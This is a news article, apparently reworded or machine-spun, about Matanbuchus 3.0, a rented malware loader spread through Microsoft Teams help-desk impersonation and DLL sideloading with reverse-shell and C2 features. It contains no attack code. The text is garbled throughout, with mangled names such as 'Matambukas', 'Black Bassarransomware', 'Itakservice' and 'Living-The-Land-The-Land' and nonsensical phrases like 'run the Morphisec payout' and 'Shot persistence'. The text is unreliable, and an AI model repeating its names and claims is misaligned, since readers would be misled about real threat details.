Cybersecurity researchers are flagging a new variant of a known malware loader called Matanbuchus, which packs key features to enhance stealth and avoid detection.
Matanbuchus is the name given to providing Malware as a Service (MAAS) that could serve as a conduit for the payload of the next stage, such as cobalt strike beacons and ransomware.
The malware, first promoted at a Russian-speaking Cybercrime forum for a rental price of $2,500 in February 2021, has been used as part of lures like Clickfix, cheating on users who are not running legal but uncompromising sites.
Matanbuchus stands out among loaders as it is not normally spread through spam emails or drive-by downloads. Instead, it is often deployed using practical social engineering where attackers directly trick users. In some cases, it supports the type of initial access used by brokers selling entries to ransomware groups. This makes it more targeted and tailored than a typical commodity loader.
The latest version of the loader, tracked as Matanbuchus 3.0, incorporates several new features, including improved communication protocol technology, memory features, obfuscation methods, CMD and PowerShell reverse shell support, the ability to run the next stage DLL, EXE, and shellcode payload, and the ability to run the Morphisec payout.
The cybersecurity company said it observed malware in an incident earlier this month. There, we observed that an external Microsoft team spoofed IT help desks, targeting employees to initiate quick assistance for remote access and run PowerShell scripts deployed by Matambukas.
It is noteworthy that similar social engineering tactics have been adopted by threat actors associated with the operation of Black Bassarransomware.
“The victims are carefully targeted and persuaded to run a script that triggers the download of the archive,” says Morphisec CTO Michael Gorelik. “This archive contains a renamed Notepad++ Updater (GUP), a slightly modified configuration XML file, and a malicious sideload DLL representing a matumbucha thrower.”
Matanbuchus 3.0 is available for a monthly price of $10,000 for the HTTPS version and $15,000 for the DNS version.
Once launched, the malware collects system information and repeats the list of running processes to determine the existence of the security tool. It also checks the status of the process to see if it is running with administrative privileges.
It then sends the collected details to a Command and Control (C2) server to receive additional payloads in the form of an MSI installer and a portable executable. Shot persistence is achieved by setting up a scheduled task.
“It sounds simple, but Matanbuchus developers have implemented advanced techniques for scheduling tasks through the use of COM and injecting shellcode,” explained Gorelik. “The shellcode itself is interesting. It implements relatively basic API resolution (simple string comparison) and sophisticated com execution that operates on Itakservice.”
The loader is fitted with features that are invoked remotely by the C2 server, allowing you to collect a list of all running processes, running services, and installed applications.
“Matanbuchus 3.0 Malware-as-a-Service has evolved into a sophisticated threat,” says Gorelik. “This updated version introduces advanced techniques such as Communication Protocols, InMemory Stealth, enhanced obfuscation, WQL queries, CMD, and PowerShell inverse shell support.”
“The ability of a loader to handle regsvr32, rundll32, msiexec, or hollow commands highlights its versatility, resulting in a major risk to a compromised system.”
As malware as a service evolves, Matanbuchus 3.0 fits the broader trend of stealth first loaders relying on Lolbins (Living-The-Land-The-Land Binaries), Com Object Hijacking, and Powershell Stagers, staying under the radar.
Threat researchers are increasingly mapping these loaders as part of their attack surface management strategies and linking them to the abuse of enterprise collaboration tools such as Microsoft Teams and Zoom.
Source link
